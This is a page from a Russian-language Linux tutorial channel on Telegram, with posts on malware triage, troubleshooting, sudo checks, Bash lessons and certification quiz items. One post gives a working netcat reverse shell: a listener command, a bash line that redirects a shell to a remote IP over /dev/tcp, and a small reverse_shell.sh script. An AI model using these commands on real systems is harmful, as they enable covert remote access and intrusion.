Linux Skill - Освой Linux c нуля до DevOps – Telegram
Linux Skill - Освой Linux c нуля до DevOps
11.3K subscribers
67 photos
103 videos
499 links
Освой Linux c нуля до DevOps
Подробный гайд по Linux и море других уроков для системных администраторов

📩 По всем вопросам: @chorapov

РКН https://vk.cc/cMUwm4
Download Telegram
🚨 Процесс с неизвестным именем грузит CPU на 25000%! Что происходит?

Привет, повелитель терминала! На одном из серверов Linux обнаружили странный процесс:
- Имя вроде 89cdb92b, потом меняется на другое (ac1e4262)
- Процесс запущен от root
- CPU загружено на 25369% (!)
- Файл процесса уже удалён: /proc/<PID>/exe → (deleted)

Это может быть майнер или вредоносная программа. Простое перезагружение не решает проблему: процесс появляется снова.

🔍 Что делать:

1. Проверить родителя процесса:
   pstree -sap <PID>


2. Узнать командную строку процесса:
   ps -o args -p <PID>


3. Скопировать бинарник для анализа:
   cp /proc/<PID>/exe /tmp/suspect_binary


4. Безопасно изучить его содержимое:
   strings /tmp/suspect_binary


5. Проверить открытые файлы:
   lsof -p <PID>


6. Изучить логи на момент запуска процесса:
   journalctl -S 'YYYY-mm-dd HH:MM'


📌 Важно: при компрометации — лучше переустановить систему с чистого образа!

🌐 Источник: https://unix.stackexchange.com/questions/782519/high-cpu-usage-by-process-with-obfuscated-name-on-linux-server-potential-attac

📩 Завтра: Как узнать ВСЁ о железе и системе в Linux за 5 минут
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Неожиданные секреты Linux: 12 утилит, которые спасут твой сервер!
🧠 - Открой для себя 15 малоизвестных команд LINUX, которые изменят твою жизнь
🧠 - Как удалить экспортированную переменную окружения в Linux?

#stackoverflow @LinuxSkill #Linux #Security #Malware #CPU #Root
👍22
🛠️ 10 самых частых ошибок в Linux и как быстро их исправить

Привет, цифровые искатели приключений! 🧭

Если ты хоть раз настраивал Linux, ты точно натыкался на эти проблемы.
Лови экспресс-гайд, который спасет тебе часы нервов и дебага!

🛡️ Ошибки при обновлении и установке пакетов

- Почини сломанные зависимости:

  sudo apt-get install -f


- Очисти кэш и обнови пакеты:

  sudo apt-get clean
sudo apt-get update


🌐 Проблемы с сетью

- Проверь интерфейсы:

  ip a


- Перезапусти сеть:

  sudo systemctl restart NetworkManager


- Проверь DNS:

  cat /etc/resolv.conf


🔐 Проблемы с правами доступа

- Выполни команду от суперпользователя:

  sudo <command>


- Исправь права на файлы и каталоги:

  sudo chmod 755 /path/to/dir
sudo chown user:user /path/to/file


🖥️ Проблемы с загрузкой системы

- Восстанови GRUB:

  sudo grub-install /dev/sda
sudo update-grub


- Проверь файловую систему:

  sudo fsck /dev/sda1


🗄️ Нет места на диске

- Посмотри занятое пространство:

  df -h


- Очисти временные файлы:

  sudo apt-get clean
sudo rm -rf /var/cache/apt/archives/*


📡 Проблемы с NFS

- Проверь и перезапусти сервисы:

  sudo systemctl status nfs-server
sudo systemctl restart nfs-server


🐍 Конфликты в Python

- Используй виртуальные окружения:

  python3 -m venv myenv
source myenv/bin/activate
pip install <package>


🔥 Проблемы с SELinux

- Просмотри логи:

  sudo ausearch -m avc -ts recent


- Переключи в permissive-режим:

  sudo setenforce 0


🧩 Ошибки с модулями ядра

- Загрузи модуль вручную:

  lsmod
sudo modprobe <module>


🔥 Проблемы с фаерволом

- Посмотри текущие правила:

  sudo iptables -L


- Открой нужный порт:

  sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT


📚 Забирай эту базу знаний в закладки и экономь часы жизни! Проблемы больше не застанут тебя врасплох.

📩 Завтра: Reverse Shell на практике: подключаемся к скрытому серверу за 1 минуту
Включи 🔔 чтобы не пропустить!
________________

Дополнительный материал:
🧠 - Открой секреты своей системы: 18 команд которые должен знать каждый линуксоид!
🧠 - Осторожно: Никогда не запускай эти 11 команд в Linux!
🧠 - Защита SSH-сервера: порты, ключи и iptables

#Linux_Mastery @LinuxSkill #Linux #Troubleshooting #Errors #Sysadmin #DevOps
👍40🔥6
🚀 Reverse Shell на практике: подключаемся к скрытому серверу за 1 минуту!

Привет, цифровые исследователи и администраторы!

Хочешь получить доступ к серверу за NAT или в приватной сети без прямого IP? Без проброса портов и плясок с VPN?

Лови лайфхак с Netcat — проверенный способ настроить Reverse Shell за пару команд!

#Что делаем:

1. У удалённого инженера на своей машине:

nc -lvnp 2288

> Параметры:
> - -l — слушать входящие подключения
> - -v — подробный режим
> - -n — не использовать DNS
> - -p — указать порт

2. На целевом сервере (внутреннем):

/bin/bash -i > /dev/tcp/IP_инженера/2288 0<&1 2>&1


И вуаля! Инженер получает полноценный терминал с правами текущего пользователя. 🎯

Важно:
- Проверь IP заранее.
- Убедись в правах доступа.
- Используй только в рамках закона и корпоративных правил! ⚖️


🛠️ Автоматизация: скрипт Reverse Shell за 1 команду

Чтобы ещё быстрее организовать подключение, можно использовать мини-скрипт:

#!/bin/bash
read -p "Введите IP инженера: " IP
read -p "Введите порт (по умолчанию 2288): " PORT
PORT=${PORT:-2288}
bash -i >& /dev/tcp/${IP}/${PORT} 0>&1


Как использовать:
1. Сохрани этот код в файл, например reverse_shell.sh.
2. Выдай права на исполнение:
chmod +x reverse_shell.sh

3. Запусти:
./reverse_shell.sh

Скрипт сам спросит IP и порт, а дальше всё произойдёт автоматически!

📩 Завтра: Вопрос №27 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!

____________________

Дополнительный материал:
🧠 - Производительность Nginx против Traefik: кто победит?
🧠 - Как уменьшить размер образа Docker: от 1,2 ГБ до 10 МБ
🧠 - Нужно ли ставить кавычки вокруг переменных в shell-скриптах?

#Linux #Netcat #Security #ReverseShell
👍16👎1
Вопрос №27 из теста Linux Essentials Certification: Какие права установить для файла? Владелец должен открывать и редактировать, а члены группы — только читать. Остальные — без доступа. Какой chmod выбрать?
Anonymous Quiz
5%
0466
20%
0751
7%
0444
13%
0540
56%
0640
👀9👍6
Media is too big
VIEW IN TELEGRAM
🚀 Урок 4 — Почему case круче вложенных if в Bash

Привет! 👋
Сегодня разберём тему, которая сэкономит тебе нервы и часы работы в Bash-скриптах — конструкцию case.
Научимся заменять кучу вложенных if на красивую, компактную структуру.

Зачем смотреть:
- Поймёшь, как избавиться от запутанных вложенных условий.
- Упорядочишь логику скриптов, сделав их читабельнее и надежнее.
- Научишься строить крутые сценарии обработки пользовательского ввода.

Таймкоды:
00:02 — Введение в конструкцию case
02:16 — Пример использования case
05:18 — Мультибор условий
08:43 — Комбинируем case и цикл while
15:09 — Управление циклом с помощью break и exit
23:47 — Заключение о возможностях конструкции
26:35 — Тестирование и демонстрация ошибок
27:27 — Проблемы вложенности if
28:09 — Как сделать код компактным и читаемым
28:20 — Финальные советы и прощание

🌐 Источник: https://www.youtube.com/watch?v=bdTDSprkTGE

📩 Завтра: Вопрос №28 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Мастер-класс по iptables: блокируем IP, создаем файрвол и управляем трафиком!
🧠 - Prometheus - Как установить Grafana, настроить Data Source, добавить Dashboards?
🧠 - Защити свои данные: Автоматическое резервное копирование на Linux

#Linux_youtube @LinuxSkill #bash #linux #скрипты #обучение
👍14🔥2
Media is too big
VIEW IN TELEGRAM
🎯 Урок 5 — Функции Bash за 49 минут: основы, примеры, фишки

Привет, цифровые дирижёры и мастера настроек! 🚀 Сегодня мы настраиваем Bash на новый уровень!
Хочешь писать чистый и красивый код в Bash? Тогда тебе сюда!
Разберём, как использовать функции: передача параметров, возврат значений, обработка ошибок и крутые практические примеры. Всё за 10 минут — быстро, чётко и по делу.

### Таймкоды:
00:05 — Введение в функции в Bash
02:14 — Передача параметров в функции
09:24 — Область видимости переменных
20:38 — Возвращение значений из функций
22:24 — Пример использования echo
23:53 — Коды выполнения функций
25:39 — Примеры возврата и обработки ошибок
29:49 — Проблемы с перезаписью значений
31:19 — Использование case для обработки кодов
34:24 — Практическое применение: проверка файлов
36:07 — Проверка директорий
37:47 — Тестирование функций
40:25 — Обработка кодов возврата
44:00 — Практическая автоматизация
46:42 — Переопределение системных команд
48:19 — Заключение

🌐 Источник: https://www.youtube.com/watch?v=YtJjsHAynQU

📩 Завтра: Можешь ли ты использовать sudo без пароля? Проверь за 5 секунд!
Включи 🔔 чтобы не пропустить!
________________

Дополнительный материал:
🧠 - Prometheus - Как мониторить Динамичное количество серверов на AWS
🧠 - Освободи место на сервере: 5 способов автоматического удаления старых файлов!
🧠 - Cruft: Утилита для поиска ненужных файлов на Linux серверах

#Linux_youtube @LinuxSkill #bash #linux #bashскрипты #программирование
👍18🔥3
🚨 Можешь ли ты использовать sudo без пароля? Проверь за 5 секунд!

👋 Привет, мастер терминала! Иногда нужно понять: можешь ли ты выполнять команды через sudo без запроса пароля? Особенно важно для скриптов и автоматизации.

Базовая проверка:

sudo -n true 2>/dev/null || exit 1

- -n запрещает запрос пароля.
- Команда мгновенно завершится с ошибкой, если пароль требуется.

🛡️ Проверка без влияния кэшированных сессий:

sudo -k
sudo -n true 2>/dev/null || exit 1

- sudo -k очищает кэш пароля.

🔍 Защита от частных NOPASSWD правил:

rand=$(mktemp /tmp/true.XXXXX)
cp /usr/bin/true "$rand"
sudo -n "$rand" 2>/dev/null && echo "Есть доступ" || echo "Нет доступа"
rm "$rand"

- Проверяем реальное право на запуск любой команды без пароля.

🌐 Источник: https://unix.stackexchange.com/questions/777552/check-if-current-user-can-run-sudo-without-requiring-a-password

📩 Завтра: Что будет, если ввести неправильный пароль в sudo? (спойлер: тебя унизят)
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Производительность Nginx vs Apache: кто победит?
🧠 - Как измерить время выполнения программы в Linux?
🧠 - Осторожно: Как не стать жертвой сниффинга паролей на Linux!

#stackoverflow @LinuxSkill #linux #bash #sudo #shell #security
👍12
Что будет, если ввести неправильный пароль в sudo? (спойлер: тебя унизят)

Привет, повелитель терминала! 🖥️

Ты знал, что в Linux можно включить "режим унижений" прямо через sudo? 😈
Каждый раз, когда ты вводишь неправильный пароль, система будет подшучивать над тобой острыми фразочками.
Всё работает без установки стороннего шлака!

🚀 Как включить «оскорбительный режим»

Добавь в /etc/sudoers или в отдельный файл в /etc/sudoers.d/ строчку:

Defaults insults


Теперь попробуй выполнить команду от пользователя:

sudo apt update

и нарочно введи неправильный пароль.

Все фразы зашиты в библиотеку /usr/libexec/sudo/sudoers.so.

🎯 Как вывести свои собственные оскорбления

Хочешь персонализировать ответы? Легко!

1. Сначала закомментируй Defaults insults.
2. Добавь свою фразу:

Defaults badpass_message="Попробуй ещё раз, герой терминала!"


Или сделай ротацию фраз через скрипт:

#!/bin/bash
messages=("Неверный пароль! Ты уверен, что это твоя клавиатура?"
"Еще одна ошибка — и я вызываю хакеров!"
"Может, стоит попробовать старый пароль?")
echo "${messages[$RANDOM % ${#messages[@]}]}"


📩 Завтра: Ускоряй рутину в 5 раз: DevToys спасает!
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Автоматизация кибербезопасности: 5 полезных скриптов на Bash
🧠 - Сравнение производительности Nginx и Caddy Performance: кто победит?
🧠 - Как сделать простую защиту от DoS-атак с Fail2Ban?

#Linux_Mastery @LinuxSkill #Linux #Sudo #Fun #Sysadmin
👍23🔥9
🚨 Ускоряй рутину в 5 раз: DevToys спасает!

Привет, цифровые мастера и оптимизаторы времени! Надоело переключаться между кучей мелких утилит?
Хочешь, чтобы базовые задачи решались быстро и удобно прямо на месте?

Тогда встречай DevToys — универсальный набор инструментов для разработчиков и системных администраторов! ⚙️

Что умеет DevToys прямо из коробки:

- 🔑 Генерация и декодирование JWT
- 📦 Базовая кодировка/декодировка Base64
- 🧮 Быстрые конвертации JSON YAML
- 🖥️ Преобразование UUID, хеширование (SHA, MD5)
- 🔍 Форматирование SQL-запросов
- 🖋️ Валидация регулярных выражений
- 📜 Работа с текстами: сравнение, преобразование
- 🌐 Проверка IP-адресов, портов и других сетевых параметров

Фишка: все это доступно локально — без отправки данных в облако! 🔒

Установка элементарная: через snap, flatpak или компиляцию с GitHub.

🌐 Источник: https://github.com/DevToys-app/DevToys

📩 Завтра:
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Что означает $@ в shell скрипте?
🧠 - Защити свой сервер: Настройка безопасности SSH на Linux
🧠 - Избавься от лишнего: Как установить только нужные пакеты в Linux

#Linux_Mastery #Linux #DevTools #Productivity #Sysadmin #OpenSource
👍9
Вопрос №29 из теста Linux Essentials Certification: Какая команда создаёт файл в Linux?
Anonymous Quiz
20%
mkfile
6%
create
73%
touch
1%
build
0%
nico
👍14🔥6👎1👀1
Media is too big
VIEW IN TELEGRAM
🌟 Урок 6 — Спецсимволы Bash, без которых не пишут скрипты

Привет, кулинары загрузочных экранов и гурманы GRUB! Сегодня варим вкусный суп из спецсимволов Bash!
Хочешь разобраться, что делают решетка, кавычки, слэши и скобки в скриптах?
Этот урок даст тебе полную картину! Узнаешь, как спецсимволы ускоряют написание кода, упрощают проверки и делают твои Bash-скрипты мощнее. 🚀

### Таймкоды:
00:04 — Символ решетки: комментарии
03:01 — Точка с запятой и завершение команд
04:25 — Точка и навигация по каталогам
09:15 — Двойные кавычки: строки и спецсимволы
10:25 — Запятая: арифметика и конкатенация
13:43 — Обратный слэш: экранирование
15:24 — Прямой слеш: пути к файлам
15:48 — Обратная кавычка: подстановка команд
17:09 — Двоеточие: пустая команда
22:15 — Восклицательный знак и логика в терминале
27:09 — Вопросительный знак и группировка команд
32:35 — Фигурные скобки и массивы
36:33 — Перенаправление потоков
42:07 — Квадратные скобки и условия
45:27 — Инкремент, декремент, арифметика
48:46 — Перенаправление вывода в файлы
53:28 — Дописывание и пайплайны
57:57 — Логическое "или" и выполнение в фоне
01:05:09 — Заключение

🌐 Источник: https://www.youtube.com/watch?v=u6ZjTDuN6is)

📩 Завтра: Почему set -e в bash может сломать тебе всё!
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Самый популярный вопрос по Linux на StackOverflow: 11,7 миллионов просмотров
🧠 - Как использовать Ansible для автоматизации установки и настройки веб-сервера Apache под Linux
🧠 - Как рекурсивно найти все файлы в текущей и поддиректориях с использованием шаблонов?

#Linux_youtube #bash #linux #bashскрипты #программирование
🔥8👍4
Вопрос №30 из теста Linux Essentials Certification: Что выдаст chmod 654 file.txt?
Anonymous Quiz
19%
-rwxrw--x
12%
--wxr-x--x
11%
Drw-r-xr--
56%
-rw-r-xr--
2%
D--wxr-x--
👍14🔥4👀1
Forwarded from Мир Linux
Идеальная шпаргалка по cron в Linux с примерами 🐧

@linuxos_tg
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥28👍12
Media is too big
VIEW IN TELEGRAM
🔍 Урок 7 — Как искать программы в PATH через Bash

Привет, техно-творцы и энтузиасты кастомизации! Сегодня научимся находить исполняемые файлы в системе быстро и красиво.

Если хочешь уверенно ориентироваться в системных путях и понимать, почему иногда "команда не найдена" — этот урок точно для тебя! 🚀

Разберем практическое написание скрипта для поиска команды в PATH: создание функций, обработку ошибок и тестирование.

### Таймкоды:
00:03 — Введение и создание скрипта
01:20 — Написание функций инпас и чек
03:22 — Реализация поиска команды в директориях
05:35 — Проверка существования исполняемых файлов
12:32 — Обработка аргументов и запуск скрипта
18:06 — Тестирование и отладка работы скрипта
24:05 — Заключение и советы по использованию

🌐 Источник: https://www.youtube.com/watch?v=7PUqf1sopFI

📩 Завтра: Почему set -e в bash может сломать тебе всё!
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Darling: Запускай MacOS приложения на Linux как профи!
🧠 - Как использовать Ansible для автоматизации настройки и резервного копирования конфигурации устройств
🧠 - Как изменить цвет вывода команды echo в Linux?

#Linux_youtube #bash #linux #bashскрипты #поисккоманд
👍10🔥2
🚀 Как за 1 минуту определить, чем управляется сеть в Linux?

Привет, мастер серверов! 👋
Сегодня разберём, как быстро понять, что именно рулит сетью на вашем Linux-сервере — без лишней магии и догадок!

🔍 Пошаговый чек:

1. Проверка старой школыifupdown:
   systemctl status networking.service


2. Есть ли NetworkManager?
   systemctl status NetworkManager


3. Активен ли systemd-networkd?
   systemctl status systemd-networkd


4. Ищем Netplan (обычно для облаков):
   ls /etc/netplan/


5. Быстрая проверка активных сетевых демонов:
   networkctl status
nmcli general status
netplan status


Если активно /etc/network/interfaces + networking.service — значит у вас классическая схема через ifupdown.
Если активен NetworkManager — скорее всего десктоп или ноутбук.
Если активен systemd-networkd — модульная минималистичная конфигурация.
Если есть /etc/netplan/ — используется промежуточный слой Netplan.

🌐 Источник: https://unix.stackexchange.com/questions/785544/how-to-know-if-the-network-is-configured-through-etc-network-interfaces-networ

📩 Завтра: Почему set -e в bash может сломать тебе всё!
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - 10 самых частых ошибок в Linux и как быстро их исправить
🧠 - Reverse Shell на практике: подключаемся к скрытому серверу за 1 минуту!
🧠 - Урок 4 — Почему case круче вложенных if в Bash

#stackoverflow #Linux #Network #SysAdmin #Networking #Debian #NetworkManager #Systemd #Netplan
👍9🔥9
🎯 Автоматизируй деплой в один клик через GitLab Variables

Привет, цифровые мастера! 🧑‍💻

Сегодня разберём фишку, которая облегчит жизнь всем, кто работает с GitLab CI/CD: как сделать удобные выпадающие списки переменных прямо на этапе запуска пайплайна! 🚀

Обычно перед стартом Pipeline нужно руками вбивать переменные окружения типа ENVIRONMENT=stage/production.
Это неудобно, долго и приводит к ошибкам.

Решение — сделать выпадающие списки в .gitlab-ci.yml:

variables:
ENVIRONMENT:
value: "N/A"
options:
- "N/A"
- "STAGE"
- "PRODUCTION"
denoscription: "Deployment environment"


🎯 Что это даёт:
- Не нужно помнить варианты окружений
- Минимизируем ошибки
- Быстрый выбор через UI

А дальше через rules можно легко управлять логикой деплоя:

deploy:
noscript:
- echo "Deploying to $ENVIRONMENT"
rules:
- if: '$ENVIRONMENT == "STAGE"'
variables:
WEB_NODE: "xx.xx.xx.xx"
- if: '$ENVIRONMENT == "PRODUCTION"'
variables:
WEB_NODE: "yy.yy.yy.yy"


🎁 Бонус: Один пайплайн на несколько проектов

Чтобы не копировать .gitlab-ci.yml везде:

include:
- project: "dev/pipelines"
file: ".gitlab-ci.yml"

Теперь все проекты тянут пайплайн из одного места!

📩 Завтра: Ускорь создание виртуалок в Linux за пару минут с Quickemu
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Linux команды: sudo !!,man,cd ,jot,cal,tac,w,yes,du,expr,look,espeak
🧠 - Linux команды: factor, reset, mtr, ps aux, alias, tr, tree, uname, lsb_release, wall, date, uptime, hostname, shutdown, reboot, gedit, wc
🧠 - Linux команды: grep, zip, unzip, tar

#Linux_Mastery #DevOps #GitLab #CICD #Automation
🔥12👍1
🚀 Ускорь создание виртуалок в Linux за пару минут с Quickemu

Привет, цифровые исследователи! 🧑‍🚀

Если тебе нужно быстро протестировать новую ОС, окружение или обновление — забудь про тяжёлые VirtualBox и KVM.
Встречай Quickemu — минималистичный инструмент для молниеносной установки виртуалок!

Что такое Quickemu?
Это скрипт на bash, который автоматизирует развёртывание виртуальных машин через QEMU.
Сам определяет настройки оптимальные для твоего железа. Минимум настроек — максимум скорости.

📦 Как установить:

sudo apt install quickemu

(на Arch: yay -S quickemu)

Как развернуть виртуалку:

quickget ubuntu-mate
quickemu --vm ubuntu-mate.conf


quickget — скачает ISO и подготовит конфигурацию.
quickemu — запустит виртуалку за считанные секунды.

#🛠️ Особенности:
- Автоматический подбор параметров виртуалки
- Поддержка множества популярных ОС
- Минимальные требования к ресурсам
- Идеально подходит для тестов и быстрой отладки

🌐 Источник: https://spy-soft.net/quick-virtual-machines-installation-linux-quickemu/

📩 Завтра: Вопрос №31 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Linux команды: gksu, pstree, top, screenfetch
🧠 - Диспетчер задач в Linux
🧠 - Лучшие практики для повышения производительности Linux-системы

#Linux_Mastery #linux #virtualization #devops #qemu
👍19🔥1
Вопрос №31 из теста Linux Essentials Certification: Which command lists all files in the current directory that starts with a capital letter? | Какой командой можно вывести все файлы в текущем каталоге, имена которых начинаются с заглавной буквы?
Anonymous Quiz
66%
ls [A-Z]*
14%
ls --uppercase-files
8%
ls A-Z
13%
ls A-Z*
👍19
Media is too big
VIEW IN TELEGRAM
🚀 Урок 8 — Проверка ввода в Bash: только буквы и цифры

Привет, хранитель чистого ввода! 👋
Сегодня научимся защищать свои скрипты от “грязного” ввода — проверим, чтобы пользователь вводил только буквы и цифры. Безопасность начинается с мелочей!

Зачем смотреть?
Узнаешь, как фильтровать ввод в Bash без сторонних утилит
Освоишь sed и регулярные выражения для практической проверки
Научишься обрабатывать пустой ввод, спецсимволы и даже номера телефонов

Таймкоды:
00:03 — Введение в проверку ввода пользователя
01:03 — Практическое применение: зачем фильтровать
01:36 — Пишем функцию проверки
03:27 — Основы команды sed
09:13 — Модификаторы замены и фильтрация
11:13 — Проверка на буквы и цифры через sed
14:40 — Логика сравнения строк
16:00 — Запрос ввода и запуск скрипта
19:25 — Демонстрация работы
21:04 — Расширение условий (пробелы, точки, регистр)
24:35 — Проверка телефонных номеров
30:10 — Заключение и прощание

🌐 Источник: https://youtu.be/C79oNzFgcEI?si=-79rZmAPOl4zxQkX

📩 Завтра: Вопрос №32 из теста Linux Essentials Certification
Включи 🔔 чтобы не пропустить!
____________________

Дополнительный материал:
🧠 - Секреты Bash: Как тестировать порты без curl и wget!
🧠 - Как правильно зачистить логи Nginx: Избегай ошибок!
🧠 - Файловая система ZFS: отказоустойчивость, RAID и целостность данных
#Linux_youtube #bash #linux #bashскрипты #обучение #Linux\_youtube
👍10👀1
Вопрос №32 из теста Linux Essentials Certification: How is it possible to determine if an executable file is a shell noscript which is read by Bash? Как определить, является ли исполняемый файл shell-скриптом, который читается Bash?
Anonymous Quiz
67%
The file line starts with #!/bin/bash
6%
Scripts are never executable files
3%
The r bit is set
14%
The file must end with .sh
10%
/bin/bash has to be run in debug mode
👍7👀6